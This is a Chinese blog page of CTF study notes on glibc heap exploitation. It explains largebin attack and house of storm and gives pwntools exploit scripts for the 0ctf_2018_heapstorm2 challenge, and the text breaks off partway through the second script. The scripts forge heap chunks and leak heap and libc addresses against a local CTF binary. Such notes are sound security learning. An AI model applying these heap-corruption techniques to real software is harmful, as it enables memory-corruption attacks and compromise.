<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>学习篇 | 墨水彩笔</title><meta name="author" content="墨水彩笔"><meta name="copyright" content="墨水彩笔"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="学习篇学习清单 123456789101112131415161718192021PWN学习之house of系列https:&#x2F;&#x2F;blog.csdn.net&#x2F;qq_41071646&#x2F;article&#x2F;details&#x2F;98987221unlinkunsortedbin attacksmall binunlinkLargeBin Attackh">
<meta property="og:type" content="article">
<meta property="og:title" content="学习篇">
<meta property="og:url" content="http://example.com/2022/08/11/%E5%AD%A6%E4%B9%A0%E7%AF%87/index.html">
<meta property="og:site_name" content="墨水彩笔">
<meta property="og:description" content="学习篇学习清单 123456789101112131415161718192021PWN学习之house of系列https:&#x2F;&#x2F;blog.csdn.net&#x2F;qq_41071646&#x2F;article&#x2F;details&#x2F;98987221unlinkunsortedbin attacksmall binunlinkLargeBin Attackh">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg">
<meta property="article:published_time" content="2022-08-11T12:00:33.000Z">
<meta property="article:modified_time" content="2022-08-13T06:16:46.222Z">
<meta property="article:author" content="墨水彩笔">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2022/08/11/%E5%AD%A6%E4%B9%A0%E7%AF%87/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2022-08-13 14:16:46'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(function () {
  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }

  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }
})()</script><meta name="generator" content="Hexo 5.2.0"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/null" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">Articles</div><div class="length_num">67</div></a></div></div></div><hr/></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AD%A6%E4%B9%A0%E7%AF%87"><span class="toc-number">1.</span> <span class="toc-text">学习篇</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#LargeBin-Attack"><span class="toc-number">1.0.1.</span> <span class="toc-text">LargeBin Attack</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98%EF%BC%9A0ctf-2018-heapstorm2"><span class="toc-number">1.1.</span> <span class="toc-text">例题：0ctf_2018_heapstorm2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#house-of-storm"><span class="toc-number">1.2.</span> <span class="toc-text">house of storm</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%84%E5%A4%87%E7%9F%A5%E8%AF%86"><span class="toc-number">1.2.1.</span> <span class="toc-text">预备知识</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#house-of-emma"><span class="toc-number">1.3.</span> <span class="toc-text">house_of_emma</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#house-of-cat"><span class="toc-number">1.4.</span> <span class="toc-text">house_of_cat</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#rctf-2019-babyheap"><span class="toc-number">2.</span> <span class="toc-text">rctf_2019_babyheap</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">墨水彩笔</a></span><span id="menus"><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">学习篇</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2022-08-11T12:00:33.000Z" title="Created 2022-08-11 20:00:33">2022-08-11</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2022-08-13T06:16:46.222Z" title="Updated 2022-08-13 14:16:46">2022-08-13</time></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1 id="学习篇"><a href="#学习篇" class="headerlink" title="学习篇"></a>学习篇</h1><p>学习清单</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">PWN学习之house of系列</span><br><span class="line">https:&#x2F;&#x2F;blog.csdn.net&#x2F;qq_41071646&#x2F;article&#x2F;details&#x2F;98987221</span><br><span class="line"></span><br><span class="line">unlink</span><br><span class="line"></span><br><span class="line">unsortedbin attack</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">small binunlink</span><br><span class="line"></span><br><span class="line">LargeBin Attack</span><br><span class="line">https:&#x2F;&#x2F;www.freebuf.com&#x2F;articles&#x2F;system&#x2F;232676.html</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">FSOP</span><br><span class="line">https:&#x2F;&#x2F;ctf-wiki.org&#x2F;pwn&#x2F;linux&#x2F;user-mode&#x2F;io-file&#x2F;fsop&#x2F;</span><br><span class="line">House OF Emma</span><br><span class="line">https:&#x2F;&#x2F;bbs.pediy.com&#x2F;thread-270429.htm</span><br><span class="line">House of Cat</span><br><span class="line">https:&#x2F;&#x2F;bbs.pediy.com&#x2F;thread-273895.htm</span><br></pre></td></tr></table></figure>

<h3 id="LargeBin-Attack"><a href="#LargeBin-Attack" class="headerlink" title="LargeBin Attack"></a>LargeBin Attack</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">我们以64位，libc 2.27为例，其实与2.23差不多，只不过2.27中，0x420以下堆块会进入tcache，但是2.23中0x400就能进入largebin了</span><br><span class="line"></span><br><span class="line">源码中可以看到，MIN_LARGE_SIZE是（64 - 0）*0x10 &#x3D; 0x400，也就是最小的large bin</span><br><span class="line"></span><br><span class="line">现在有两种常见的利用方式：</span><br><span class="line"></span><br><span class="line">在申请largebin的过程中，伪造largebin的bk_nextsize，实现非预期内存申请。</span><br><span class="line"></span><br><span class="line">在largebin插入的过程中，伪造largebin的bk_nextsize以及bk，实现任意地址写堆地址。</span><br></pre></td></tr></table></figure>

<p><img src="https://pic3.zhimg.com/80/v2-013b4b50d1e03e09f6dab79bcfb97e52_720w.jpg" alt="img"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">上图是large bin的内部结构，large bin与其他bin的主要区别在于它使用fd_nextsize指针和bk_nextsize指针链接大小不同的链表，每条链表中大小相同的chunk用fd指针和bk指针相连，large bin使用这种结构可以更好的整理内存空间。</span><br><span class="line">fd和bk指针相连的堆块为大小相同的chunk</span><br><span class="line">fd_nextsize和bk_nextsize指针用于链接不同大小的chunk</span><br><span class="line">fd_nextsize指向比自己小的链表中最大的链表的链头</span><br><span class="line">bk_nextsize指向比自己大的链表中最小的链表的链头 </span><br><span class="line">large bin使用FIFO分配策略</span><br><span class="line"></span><br><span class="line">largebin attack就是利用在将unsorted bin中的chunk放到large bin中时会改变fd_nextsize指针、bk_nextsize指针、fd指针和bk指针完成的</span><br><span class="line"></span><br><span class="line">我们知道一共有136个bin，fast bin是一个单独的数组，其中有10个bin，剩下的126个bin是另一个数组，这126个bin中序号1是unsorted bin，序号2到序号63是small bin，64到126是large bin。</span><br></pre></td></tr></table></figure>





<h2 id="例题：0ctf-2018-heapstorm2"><a href="#例题：0ctf-2018-heapstorm2" class="headerlink" title="例题：0ctf_2018_heapstorm2"></a>例题：0ctf_2018_heapstorm2</h2><h2 id="house-of-storm"><a href="#house-of-storm" class="headerlink" title="house of storm"></a>house of storm</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">house of storm的原理其实就是：结合利用largebin attack和劫持unsortedbin后一个chunk的bk，实现把堆地址写入到任意地址，再结合unsortedbin的bk指针分配时只检查size而不检查chunk完整性（这里有点疑惑，unlink检查应该很严格，可能是绕过了而不是没有检查）分配到这个地址上（add(0x48)）实现的结果和unlink差不多。</span><br><span class="line">具体利用条件：</span><br><span class="line">1.glibc2.30以下</span><br><span class="line">2.在unsortedbin和largebin中需要有两个chunk，这两个chunk要在一个index下并且unsortedbin中的index要比largebin的大（largebin attack条件）</span><br><span class="line">3.unsortedbin的bk可控（为了分配下一个chunk）</span><br><span class="line">4.largebin中的bk和bk_nextsize可控</span><br><span class="line">	对于第二，三，四个条件，只需要off-bu-null即可以实现。</span><br><span class="line">heap_storm在实战中目前只碰到了rctf_2019_babyheap和0ctf_2018_heapstorm2，这两题的共同点是开启mallopt函数，限制没有fastbin，于是任意分配会有障碍</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">https:&#x2F;&#x2F;blog.csdn.net&#x2F;weixin_44145820&#x2F;article&#x2F;details&#x2F;105740530</span><br><span class="line">https:&#x2F;&#x2F;ama2in9.top&#x2F;2020&#x2F;09&#x2F;03&#x2F;2018_0ctf&#x2F;heapstorm2&#x2F;</span><br><span class="line">https:&#x2F;&#x2F;www.cnblogs.com&#x2F;Rookle&#x2F;p&#x2F;13140339.html	</span><br></pre></td></tr></table></figure>



<h3 id="预备知识"><a href="#预备知识" class="headerlink" title="预备知识"></a>预备知识</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">calloc 该函数返回一个指针，指向已分配的内存。如果请求失败，则返回 NULL。</span><br><span class="line">利用 calloc 分配，会清空原堆块的内容，这就需要 overlap 的时候对其中的 chunk header 等进行恢复。</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/fa5aba0fb14845b8b1b81d1b7bceb1cb.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBATjFjaDBsNHM=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p &#x3D; process(&quot;.&#x2F;0ctf_2018_heapstorm2&quot;)</span><br><span class="line">elf &#x3D; ELF(&quot;.&#x2F;0ctf_2018_heapstorm2&quot;)</span><br><span class="line">context.log_level &#x3D; &#39;debug&#39;</span><br><span class="line">#~&#x2F;tools&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.23-0ubuntu3_amd64</span><br><span class="line">#patchelf --set-interpreter ~&#x2F;tools&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.23-0ubuntu3_amd64&#x2F;ld-2.23.so --set-rpath [~&#x2F;tools&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.23-0ubuntu3_amd64] [.&#x2F;gundam]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#patchelf --set-interpreter ~&#x2F;tools&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.23-0ubuntu3_amd64&#x2F;ld-2.23.so .&#x2F;0ctf_2018_heapstorm2</span><br><span class="line">#patchelf --set-rpath  ~&#x2F;tools&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.23-0ubuntu3_amd64 .&#x2F;0ctf_2018_heapstorm2</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def add(size):</span><br><span class="line">	p.sendlineafter(&quot;Command: &quot;,&#39;1&#39;)</span><br><span class="line">	p.sendlineafter(&quot;Size: &quot;,str(size))</span><br><span class="line"></span><br><span class="line">def edit(index,content):</span><br><span class="line">	p.sendlineafter(&quot;Command: &quot;,&#39;2&#39;)</span><br><span class="line">	p.sendlineafter(&quot;Index: &quot;,str(index))</span><br><span class="line">	p.sendlineafter(&quot;Size: &quot;,str(len(content)))</span><br><span class="line">	p.sendlineafter(&quot;Content: &quot;,content)</span><br><span class="line"></span><br><span class="line">def delete(index):</span><br><span class="line">	p.sendlineafter(&quot;Command: &quot;,&#39;3&#39;)</span><br><span class="line">	p.sendlineafter(&quot;Index: &quot;,str(index))</span><br><span class="line"></span><br><span class="line">def show():</span><br><span class="line">	p.sendlineafter(&quot;Command: &quot;,&#39;4&#39;)</span><br><span class="line"></span><br><span class="line">add(0x18)#0</span><br><span class="line">add(0x508)#1</span><br><span class="line">add(0x18)#2</span><br><span class="line"></span><br><span class="line">add(0x18)#3</span><br><span class="line">add(0x508)#4</span><br><span class="line">add(0x18)#5</span><br><span class="line">add(0x18)#6</span><br><span class="line"></span><br><span class="line">payload &#x3D; b&#39;a&#39;*0x4f0+p64(0x500)</span><br><span class="line">edit(1,payload)</span><br><span class="line">delete(1)</span><br><span class="line"></span><br><span class="line">payload &#x3D; b&#39;a&#39;*(0x18-12)</span><br><span class="line">edit(0,payload)</span><br><span class="line"></span><br><span class="line">add(0x18)</span><br><span class="line">add(0x4d8)</span><br><span class="line">#这里为什么先free堆块一再free堆块二，如果放过来会怎么样呢</span><br><span class="line">经过实践发现此时heap中只存在三个堆块，如果先free堆块二那么很导致堆块二与top_chunk合并使得我们free堆块一失败</span><br><span class="line">delete(1)</span><br><span class="line">delete(2)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p &#x3D; process(&quot;.&#x2F;0ctf_2018_heapstorm2&quot;)</span><br><span class="line">elf &#x3D; ELF(&quot;.&#x2F;0ctf_2018_heapstorm2&quot;)</span><br><span class="line">libc &#x3D; ELF(&quot;.&#x2F;libc-2.23.so&quot;)</span><br><span class="line">context.log_level &#x3D; &#39;debug&#39;</span><br><span class="line">#~&#x2F;tools&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.23-0ubuntu3_amd64</span><br><span class="line">#patchelf --set-interpreter ~&#x2F;tools&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.23-0ubuntu3_amd64&#x2F;ld-2.23.so --set-rpath [~&#x2F;tools&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.23-0ubuntu3_amd64] [.&#x2F;gundam]</span><br><span class="line"></span><br><span class="line">#利用patchelf</span><br><span class="line">#patchelf --set-interpreter ~&#x2F;tools&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.23-0ubuntu3_amd64&#x2F;ld-2.23.so .&#x2F;0ctf_2018_heapstorm2</span><br><span class="line">#patchelf --set-rpath  ~&#x2F;tools&#x2F;glibc-all-in-one&#x2F;libs&#x2F;2.23-0ubuntu3_amd64 .&#x2F;0ctf_2018_heapstorm2</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def add(size):</span><br><span class="line">	p.sendlineafter(&quot;Command: &quot;,&#39;1&#39;)</span><br><span class="line">	p.sendlineafter(&quot;Size: &quot;,str(size))</span><br><span class="line"></span><br><span class="line">def edit(index,content):</span><br><span class="line">	p.sendlineafter(&quot;Command: &quot;,&#39;2&#39;)</span><br><span class="line">	p.sendlineafter(&quot;Index: &quot;,str(index))</span><br><span class="line">	p.sendlineafter(&quot;Size: &quot;,str(len(content)))</span><br><span class="line">	p.sendlineafter(&quot;Content: &quot;,content)</span><br><span class="line"></span><br><span class="line">def delete(index):</span><br><span class="line">	p.sendlineafter(&quot;Command: &quot;,&#39;3&#39;)</span><br><span class="line">	p.sendlineafter(&quot;Index: &quot;,str(index))</span><br><span class="line"></span><br><span class="line">def show(index):</span><br><span class="line">	p.sendlineafter(&quot;Command: &quot;,&#39;4&#39;)</span><br><span class="line">	p.sendlineafter(&quot;Index: &quot;,str(index))</span><br><span class="line"></span><br><span class="line">#unsortbin_attack</span><br><span class="line">add(0x18)#0</span><br><span class="line">add(0x508)#1</span><br><span class="line">add(0x18)#2</span><br><span class="line">#largerbin_attack</span><br><span class="line">add(0x18)#3</span><br><span class="line">add(0x508)#4</span><br><span class="line">add(0x18)#5</span><br><span class="line">#larger_bin_attack</span><br><span class="line">#防止top_chunk合并</span><br><span class="line">add(0x18)#6</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#unsortbin_attack</span><br><span class="line">payload &#x3D; b&#39;a&#39;*0x4f0+p64(0x500)</span><br><span class="line">edit(1,payload)</span><br><span class="line">delete(1)</span><br><span class="line">#offby_one</span><br><span class="line">payload &#x3D; b&#39;a&#39;*(0x18-12)</span><br><span class="line">edit(0,payload)</span><br><span class="line"></span><br><span class="line">add(0x18)#1</span><br><span class="line">add(0x4d8)#7</span><br><span class="line">#edit(7,b&#39;a&#39;*0x18)</span><br><span class="line">#gdb.attach(p)</span><br><span class="line"></span><br><span class="line">delete(1)</span><br><span class="line">delete(2)</span><br><span class="line"></span><br><span class="line">add(0x38)#1</span><br><span class="line">add(0x4e8)#2</span><br><span class="line"></span><br><span class="line">#largerbin_attack</span><br><span class="line">payload &#x3D; b&#39;a&#39;*0x4f0+p64(0x500)</span><br><span class="line">edit(4,payload)</span><br><span class="line">delete(4)</span><br><span class="line">#offby_one</span><br><span class="line">payload &#x3D; b&#39;a&#39;*(0x18-12)</span><br><span class="line">edit(3,payload)</span><br><span class="line"></span><br><span class="line">add(0x18)#4</span><br><span class="line">add(0x4d8)#8</span><br><span class="line"></span><br><span class="line">delete(4)</span><br><span class="line">delete(5)</span><br><span class="line">#3</span><br><span class="line">add(0x48)</span><br><span class="line">delete(2)</span><br><span class="line"></span><br><span class="line">add(0x4e8)</span><br><span class="line">delete(2)</span><br><span class="line"></span><br><span class="line">fake_chunk &#x3D; 0x13370800 - 0x20</span><br><span class="line">#edit_bk</span><br><span class="line">payload &#x3D; b&#39;a&#39; * 0x10 + p64(0) + p64(0x4f1) + p64(0) + p64(fake_chunk)</span><br><span class="line">edit(7,payload)</span><br><span class="line">#edit_bwk</span><br><span class="line">payload &#x3D; b&#39;a&#39; * 0x20 + p64(0) + p64(0x4e1) + p64(0) + p64(fake_chunk+8) + p64(0) + p64(fake_chunk-0x18-5)</span><br><span class="line">edit(8,payload)</span><br><span class="line"></span><br><span class="line">add(0x48)</span><br><span class="line"></span><br><span class="line">payload &#x3D; p64(0)*6 + p64(0x13370800)</span><br><span class="line">edit(2,payload)</span><br><span class="line">#修改siez和addr要满足view的特性</span><br><span class="line">#0x13370800+0x18 ^ 0x13370800+0x10 &#x3D; 0x13377331</span><br><span class="line">payload &#x3D; p64(0)*3 +p64(0x13377331)</span><br><span class="line">payload +&#x3D; p64(0x13370800) + p64(0x1000)</span><br><span class="line">payload +&#x3D; p64(fake_chunk+3) + p64(8)</span><br><span class="line">edit(0, payload)</span><br><span class="line"></span><br><span class="line">#泄露堆地址</span><br><span class="line">show(1)</span><br><span class="line">p.recvuntil(&quot;]: &quot;)</span><br><span class="line">heap_addr &#x3D; u64(p.recv(6).ljust(8,b&#39;\x00&#39;)) </span><br><span class="line">#unsortbin_addr</span><br><span class="line">print(hex(heap_addr))</span><br><span class="line"></span><br><span class="line">payload &#x3D; p64(0)*3 + p64(0x13377331)</span><br><span class="line">payload +&#x3D; p64(0x13370800) + p64(0x1000)</span><br><span class="line">payload +&#x3D; p64(heap_addr+0x10) + p64(8)</span><br><span class="line">edit(0, payload) </span><br><span class="line">#泄露libc</span><br><span class="line">show(1)</span><br><span 